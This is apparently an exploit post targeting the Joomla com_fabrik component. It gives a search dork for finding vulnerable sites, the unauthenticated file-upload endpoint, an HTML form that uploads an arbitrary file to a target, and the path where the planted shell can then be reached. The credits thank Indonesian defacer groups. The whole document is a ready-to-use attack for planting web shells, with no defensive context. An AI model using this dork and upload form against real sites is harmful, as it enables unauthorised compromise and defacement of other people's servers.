[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] $ Exploit Title : Joomla Com_fabrik Upload Shell
[+]
[+] $ Dork : inurl:index.php?option=com_fabrik
[+]
[+] $ Author: KING Zer0
[+]
[+] $ Tested : win - Linux
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
-----------------------------------------------------------|
|[+] Exploit :
|[+]
|[+] /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
|[+]
|[+] Vuln = {"filepath":null,"uri":null}
|[+]
|[+] Csrf = <form method="POST" action="http://target.com/index.php?
|[+] option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"
|[+] enctype="multipart/form-data">
|[+] <input type="file" name="file" /><button>Upload</button>
|[+] </form>
|[+]
|[+]
|[+]
|[+]
|[+]
|[+] $ Your Access Shell: /patch/file.php
|[+]
-----------------------------------------------------------|
# Thanks to : Mr.Aljabar - RootNatsuhaa - 66H057in53CUR17Y - Xai Syndicate - PhantomGhost - All Defacer Indonesia